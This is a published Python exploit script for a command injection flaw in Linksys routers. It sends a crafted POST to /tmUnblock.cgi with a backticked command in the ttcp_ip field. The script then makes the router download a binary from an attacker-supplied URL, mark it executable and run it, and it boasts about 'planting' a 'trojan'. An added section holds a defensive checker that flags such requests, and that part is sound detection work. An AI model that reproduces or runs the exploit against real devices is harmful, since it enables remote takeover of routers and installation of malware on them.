Linksys Worm Remote Root
Source: @info_dox  Author: infodox  Published: 2014-02-19
```python
#!/usr/bin/python2
""""
Linksys Remote Root Exploit
infodox - insecurety research
This is the exploit this "Moon" worm uses.
Trivial blind cmd injection :)
This version crippled - uses wget.
Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
"""
import requests
import sys

def banner():
    print """\x1b[0;32m
.____    .__        __
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/
You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)
\x1b[0m"""

def upShell(wget_url, target):
    """ This works with the normal busybox wget at least, and worked in testing"""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"

def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '',
                  'action': '',
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)

def main(args):
    banner()
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])

if __name__ == "__main__":
    main(sys.argv)
```
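For defenders, the request above has a narrow signature: a request to `/tmUnblock.cgi` whose `ttcp_ip` field carries shell metacharacters instead of an address. The following Python 3 check is an added example, not part of the original exploit or of any Linksys tooling; the function names and sample requests are constructed, and it assumes a legitimate `ttcp_ip` value is a bare IP address.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters; the request above wraps its command in backticks.
SHELL_META = re.compile(r"[`$;|&<>\r\n]")

def check_request(target, body=""):
    """Return findings for one request to the router's web interface."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/tmunblock.cgi"):
        return []
    # The parameter may arrive in the query string or in the form body.
    params = parse_qs(parts.query)
    for key, values in parse_qs(body).items():
        params.setdefault(key, []).extend(values)
    findings = []
    for value in params.get("ttcp_ip", []):
        if SHELL_META.search(value):
            findings.append("shell metacharacter in ttcp_ip: %r" % value)
            continue
        try:
            # Assumption: a legitimate value is a bare IP address.
            ipaddress.ip_address(value.strip())
        except ValueError:
            findings.append("ttcp_ip is not an IP address: %r" % value)
    return findings

# Constructed sample requests (request target, form body); not real traffic.
SAMPLES = [
    ("/tmUnblock.cgi", "submit_button=&change_action=&action=&commit=0"
     "&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60PLACEHOLDER%60&StartEPI=1"),
    ("/tmUnblock.cgi", "ttcp_num=2&ttcp_size=2&ttcp_ip=192.0.2.10&StartEPI=1"),
    ("/tmUnblock.cgi", "ttcp_ip=-h+example"),
    ("/index.asp", "ttcp_ip=%60PLACEHOLDER%60"),
]

def scan(samples):
    """Return (index, findings) for every sample that raised a finding."""
    hits = []
    for i, (target, body) in enumerate(samples):
        findings = check_request(target, body)
        if findings:
            hits.append((i, findings))
    return hits

if __name__ == "__main__":
    for index, findings in scan(SAMPLES):
        print(index, findings)
```

The same test works as an input-validation rule on a reverse proxy or WAF in front of the management interface, which should not be reachable from the WAN in the first place.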
 